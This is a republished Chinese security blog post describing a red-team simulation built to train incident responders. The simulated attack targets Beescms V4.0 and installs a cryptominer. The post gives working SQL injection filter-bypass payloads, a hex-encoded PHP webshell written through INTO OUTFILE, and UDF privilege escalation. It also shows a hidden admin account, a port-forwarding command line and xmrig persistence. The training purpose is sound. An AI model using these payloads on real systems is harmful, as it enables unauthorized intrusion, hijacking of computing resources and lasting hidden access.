技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

admin 2022年7月24日11:11:52评论35 views字数 2823阅读9分24秒阅读模式

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:asj-jacky

加入安世加 交流群 和大佬们一起交流安全技术

本文为整个专题的第二篇,攻击模拟的第一篇,主要模拟业务系统使用存在已知漏洞的CMS,导致被攻击,进而植入挖矿脚本的过程。

该部分主要由内部蓝军完成,攻击链路设计是 @exploitworld 负责,攻击模拟和报告编写由 @可达鸭 和 @番茄 负责,感谢为本篇文章提供素材。

技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟



01

攻击模拟说明

攻击模拟并非实战渗透,但又贴近于实战。真实的产生了攻击痕迹(日志),但为了让应急人员聚焦这部分日志,减少了其他操作。与真实情况相比,主要有两点区别:

  • 部分攻击步骤看起来没必要或者冗余,比如在获取webshell方法中,就充分利用了环境存在的漏洞,制定了两个思路拿权限,实则是在为应急响应人员提供更加丰富的分析场景;

  • 攻击动作非常明确、手法干净利落,攻击的实施完全按照剧本进行,没有带来额外的、无目的漏洞测试和利用,所以又有点偏离实战。


整个攻击模拟专项,主要分为以下五个步骤:

技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟



02


攻击链设计

攻击链取材于实际的业务场景:互联网侧开放了带有漏洞的服务,从而导致被攻击者发现利用,最终沦为矿机。攻击者的攻击手法较为常见,利用已知CMS的漏洞进行攻击,攻击模拟过程中的每一步都尽量完整操作,以便于留下攻击痕迹。

2.1 难度级别

简单

2.2 攻击链路

简单

2.3 攻击描述

通过常见的信息收集方法(端口扫描、目录扫描、cms指纹识别等),获取目标对外开放的服务和使用的CMS;然后利用已知漏洞进行攻击,获取webshell;接着对内网进行信息收集,利用udf进行权限提升;最后植入挖矿脚本,并创建后门账号、反弹端口进行远控。
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


03


资源准备

1台 windows 2008 服务器


04


靶场搭建

主要的漏洞环境为beescms,存在后台页面登录处的SQLi、登录处可爆破、登录后可任意文件上传等漏洞。详细环境如下:
操作系统版本
Web服务器
Web后端语言
DB版本
CMS版本
Windows2008
Apache端口80
PHP5.6
MySQL5.3
(开启secure_file_priv为空)
Beescms V4.0
源码地址:http://beescms.com/cxxz.html


05


实施攻击

靶标初始环境需干净、开启各项日志记录。攻击时需要记录每个动作的时间,以便后续与应急响应报告做比对

5.1 端口扫描

15:48–15:50,端口扫描,发现:发现存在http、mysql等服务;
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


5.2 网站后台扫描

15:50,进行网站后台扫描,发现:一些可利用的页面;
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


5.3 网站getshell

5.3.1 SQLi 写入一句话木马

16:24,对后台登录的用户名处,进行SQL注入
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

根据报错回显,判断user参数处存在基于报错的SQL漏洞。
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

判断当前数据库字段数,为后续进行手工注入做准备:admin’order by 5,数据库操作正常
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

继续尝试payload:admin’order by 6,数据库报错,说明字段是为5(最开始用二分法进行尝试,逐步定位正确的字段数)
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

16:37,构造payload获取数据库名emergency:user=admin' a and nd 
updatexml(1,concat(0x7e,(selselectect database()),0x7e),1)#  

注:a and nd为多次测试发现,系统对sql语句有过滤,但是可以通过复写+空格绕过 - - 网上已知

union => uni union on
select => selselectect
outfile => outoutfilefile
into => in into


技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


继续查看当前数据库权限为root,可以直接一句话文件至web目录。

17:40,写入php一句话木马文件cmd.php(beescms使用htmlspecialchars()对输入中含有特殊符号进行HTML实体转义,导致php一句话<?php @eval($_POST[cmd])?>不能写入。

利用mysql注入的特性对shell部分进行hex编码或使用MySQL函数char()进行绕过)
admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e  in into  outoutfilefile 'cmd.php'#
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


5.3.2 爆破账密登录后台上传文件getshell

16:15,开始进行后台用户名/密码,进行暴力破解(图片验证码存在缺陷,可以直接爆破),成功爆破出管理员账密admin/emergency
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

16:26,使用admin账号登录网站后台
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

16:33,在后台找到1处文件上传功能,尝试直接上传php一句话木马文件,成功上传/upload/img/202108041633293835.php
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

16:35,访问shell:202108041633293835.php
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

16:37,通过202108041633293835.php执行系统命令whoami
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

5.4 系统权限提升

使用webshell翻网站文件中的敏感信息,找到MySQL数据库的账密和配置文件。
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

发现secure_file_prive为空,可以进行udf提权
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:00,上传moon.php
当前webshell功能较为单一,重新上传一个功能丰富的大马
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:29,使用moon.php登录数据库;
18:31,创建文件plugin
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:32,导出udf提权dll成功
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:33,创建sys_eval并执行whoami
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

5.5 添加后门用户

18:37,创建影子账户adminadmin$
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:42,将账户adminadmin$加入本地管理员组
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

5.6 端口映射

19:07,上传F111.exe文件到C:emergencyphpstudytoolspear

19:10–19:11,将目标53端口映射到3389端口:F111.exe -l 53 -s 53 -r 3389 10.xx.xx.xx
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

5.7 运行挖矿文件

18:45,通过webshell上传挖矿程序xmrig.exe等四个文件
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:48,运行挖矿程序,系统CPU使用率开始飙升。
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

18:53,将挖矿程序添加到自启动中
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

19:06,注册挖矿程序服务,设置挖矿自启动
技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


06


环境备份

攻击完成之后,不再做其他的操作,立马对环境创建快照,以免过多操作给应急人员带来太多干扰。然后按照约定的方式和时间,把快照同步给各组的应急人员进行分析。

本文转自:我的安全视界观
作者:aerfa21

技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟


相关链接:
技术干货 | 【应急能力提升1】实战应急困境与突破

原文始发于微信公众号(安世加):技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月24日11:11:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术干货 | 【应急能力提升2】挖矿权限维持攻击模拟http://cn-sec.com/archives/1193252.html

发表评论

匿名网友 填写信息